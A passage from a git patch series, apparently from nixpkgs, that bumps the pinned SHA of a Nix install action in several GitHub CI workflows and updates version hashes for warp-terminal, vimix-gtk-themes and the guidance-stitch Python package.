merged-as-untrusted: true target-as-trusted: true - - uses: cachix/install-nix-action@17fe5fb4a23ad6cbbe47d6b3f359611ad276644c # v31 + - uses: cachix/install-nix-action@f0fe604f8a612776892427721526b4c7cfb23aba # v31 - uses: cachix/cachix-action@0fc020193b5a1fa3ac4575aa3a7d3aa6a35435ad # v16 with: @@ -107,7 +107,7 @@ jobs: name: Request runs-on: ubuntu-24.04-arm steps: - - uses: cachix/install-nix-action@17fe5fb4a23ad6cbbe47d6b3f359611ad276644c # v31 + - uses: cachix/install-nix-action@f0fe604f8a612776892427721526b4c7cfb23aba # v31 # Important: Because we use pull_request_target, this checks out the base branch of the PR, not the PR head. # This is intentional, because we need to request the review of owners as declared in the base branch. 
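Every hunk in this workflows commit follows the same supply-chain convention: third-party actions are pinned to a full commit SHA, with the human-readable release tag kept as a trailing comment. A minimal sketch of a job consuming the new pin is shown below; the workflow name, trigger, and job layout are illustrative assumptions, while the `uses` line, the `# v31` tag comment, the runner label, and the `extra_nix_config` value are taken from the hunks in this commit.

# Illustrative sketch only; not part of the patch series.
name: pinned-action-example   # hypothetical workflow name
on: pull_request              # hypothetical trigger

jobs:
  build:
    runs-on: ubuntu-24.04-arm   # runner label as used by the codeowners job above
    steps:
      # Pin by full commit SHA so the action cannot change under a moving tag;
      # keep the tag in a comment so humans (and bump tooling) can read the version.
      - uses: cachix/install-nix-action@f0fe604f8a612776892427721526b4c7cfb23aba # v31
        with:
          extra_nix_config: sandbox = true

Pinning by SHA rather than by tag means a compromised or force-pushed upstream tag cannot silently swap the action's code, which is why the bump above rewrites the SHA in every workflow at once.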
diff --git a/.github/workflows/eval.yml b/.github/workflows/eval.yml index 71ba62cdf4c7..5999aedcb938 100644 --- a/.github/workflows/eval.yml +++ b/.github/workflows/eval.yml @@ -46,7 +46,7 @@ jobs: path: untrusted - name: Install Nix - uses: cachix/install-nix-action@17fe5fb4a23ad6cbbe47d6b3f359611ad276644c # v31 + uses: cachix/install-nix-action@f0fe604f8a612776892427721526b4c7cfb23aba # v31 with: extra_nix_config: sandbox = true @@ -166,7 +166,7 @@ jobs: path: trusted - name: Install Nix - uses: cachix/install-nix-action@17fe5fb4a23ad6cbbe47d6b3f359611ad276644c # v31 + uses: cachix/install-nix-action@f0fe604f8a612776892427721526b4c7cfb23aba # v31 with: extra_nix_config: sandbox = true @@ -243,7 +243,7 @@ jobs: merged-as-untrusted: true - name: Install Nix - uses: cachix/install-nix-action@17fe5fb4a23ad6cbbe47d6b3f359611ad276644c # v31 + uses: cachix/install-nix-action@f0fe604f8a612776892427721526b4c7cfb23aba # v31 with: extra_nix_config: sandbox = true diff --git a/.github/workflows/lint.yml b/.github/workflows/lint.yml index 4bf917d800db..0b2da1070d20 100644 --- a/.github/workflows/lint.yml +++ b/.github/workflows/lint.yml @@ -29,7 +29,7 @@ jobs: mergedSha: ${{ inputs.mergedSha }} merged-as-untrusted: true - - uses: cachix/install-nix-action@17fe5fb4a23ad6cbbe47d6b3f359611ad276644c # v31 + - uses: cachix/install-nix-action@f0fe604f8a612776892427721526b4c7cfb23aba # v31 with: extra_nix_config: sandbox = true @@ -61,7 +61,7 @@ jobs: mergedSha: ${{ inputs.mergedSha }} merged-as-untrusted: true - - uses: cachix/install-nix-action@17fe5fb4a23ad6cbbe47d6b3f359611ad276644c # v31 + - uses: cachix/install-nix-action@f0fe604f8a612776892427721526b4c7cfb23aba # v31 with: extra_nix_config: sandbox = true @@ -86,7 +86,7 @@ jobs: targetSha: ${{ inputs.targetSha }} target-as-trusted: true - - uses: cachix/install-nix-action@17fe5fb4a23ad6cbbe47d6b3f359611ad276644c # v31 + - uses: cachix/install-nix-action@f0fe604f8a612776892427721526b4c7cfb23aba # v31 with: extra_nix_config: sandbox = true diff --git a/.github/workflows/reviewers.yml b/.github/workflows/reviewers.yml index bd1d8aed7204..1d518133cf6d 100644 --- a/.github/workflows/reviewers.yml +++ b/.github/workflows/reviewers.yml @@ -35,7 +35,7 @@ jobs: sparse-checkout: ci - name: Install Nix - uses: cachix/install-nix-action@17fe5fb4a23ad6cbbe47d6b3f359611ad276644c # v31 + uses: cachix/install-nix-action@f0fe604f8a612776892427721526b4c7cfb23aba # v31 with: extra_nix_config: sandbox = true From b3bcdb74980477c6d18cadd5f576ecd033b907dc Mon Sep 17 00:00:00 2001 From: DontEatOreo <57304299+DontEatOreo@users.noreply.github.com> Date: Tue, 24 Jun 2025 19:25:12 +0300 Subject: [PATCH 71/73] warp-terminal: 0.2025.06.18.08.11.stable_03 -> 0.2025.06.20.22.47.stable_05 Changelog: https://docs.warp.dev/getting-started/changelog#id-2025.06.20-v0.2025.06.20.22.47 --- pkgs/by-name/wa/warp-terminal/versions.json | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/pkgs/by-name/wa/warp-terminal/versions.json b/pkgs/by-name/wa/warp-terminal/versions.json index 4182beae12c9..f94041720f7c 100644 --- a/pkgs/by-name/wa/warp-terminal/versions.json +++ b/pkgs/by-name/wa/warp-terminal/versions.json @@ -1,14 +1,14 @@ { "darwin": { - "hash": "sha256-wlFmfHBSwBh9UFq6by52fGYN2EftP793u3L57XSDDKQ=", - "version": "0.2025.06.18.08.11.stable_03" + "hash": "sha256-UJAirS6JFFLW0OsOYj8RNUfG85dRHnxXasNw2QHX1Xs=", + "version": "0.2025.06.20.22.47.stable_05" }, "linux_x86_64": { - "hash": "sha256-7CfqTRUMkqLXmJg7RQK0liVEhucMOgMtsJl4/lrg4XI=", - "version": 
"0.2025.06.18.08.11.stable_03" + "hash": "sha256-h0ODaO3SJcZAxFRFBYYjWXQYsRAemGizn/YA7AF36pw=", + "version": "0.2025.06.20.22.47.stable_05" }, "linux_aarch64": { - "hash": "sha256-iDXAchU/b2ApDsmV0dnkXI1o0VOaegYWz4DufHtPFJM=", - "version": "0.2025.06.18.08.11.stable_03" + "hash": "sha256-H4xldFBMpfu6UFGFA/IkA1zPFqhFN6abhfHTRdYNpGA=", + "version": "0.2025.06.20.22.47.stable_05" } } From 5c2cad16c820e8cf2527d5f14e7a7718b195eb18 Mon Sep 17 00:00:00 2001 From: "R. Ryantm" Date: Tue, 24 Jun 2025 16:54:13 +0000 Subject: [PATCH 72/73] vimix-gtk-themes: 2024-04-20 -> 2025-06-20 --- pkgs/by-name/vi/vimix-gtk-themes/package.nix | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pkgs/by-name/vi/vimix-gtk-themes/package.nix b/pkgs/by-name/vi/vimix-gtk-themes/package.nix index 0680efbf689e..0231a5dccbd4 100644 --- a/pkgs/by-name/vi/vimix-gtk-themes/package.nix +++ b/pkgs/by-name/vi/vimix-gtk-themes/package.nix @@ -45,13 +45,13 @@ lib.checkListOfEnum "${pname}: theme variants" stdenvNoCC.mkDerivation rec { inherit pname; - version = "2024-04-20"; + version = "2025-06-20"; src = fetchFromGitHub { owner = "vinceliuice"; repo = "vimix-gtk-themes"; rev = version; - sha256 = "RbAdoix+UWKiLB+04YiPa0UwzO1fFLy56IG1MipmE+E="; + sha256 = "uRm6v+Zag4FO7nFVcHhZjVhOfdOeYBZYQym0IBR8+HU="; }; nativeBuildInputs = [ From 29c307117ba60a5590c51997540932355edfedbe Mon Sep 17 00:00:00 2001 From: "R. Ryantm" Date: Tue, 24 Jun 2025 17:44:01 +0000 Subject: [PATCH 73/73] python3Packages.guidance-stitch: 0.1.4 -> 0.1.5 --- pkgs/development/python-modules/guidance-stitch/default.nix | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pkgs/development/python-modules/guidance-stitch/default.nix b/pkgs/development/python-modules/guidance-stitch/default.nix index 27a0c17bf2dd..403f774ee611 100644 --- a/pkgs/development/python-modules/guidance-stitch/default.nix +++ b/pkgs/development/python-modules/guidance-stitch/default.nix @@ -20,13 +20,13 @@ buildPythonPackage rec { pname = "guidance-stitch"; - version = "0.1.4"; + version = "0.1.5"; pyproject = true; src = fetchPypi { pname = "guidance_stitch"; inherit version; - hash = "sha256-Wthz02C2AU6hzQ+TTGs+sI73ejwHQRCStZXZts0i1+w="; + hash = "sha256-Kg0O3oZds4eFfUlKe8sakDYhwT9XGGnN4RCcLFVpzZU="; }; build-system = [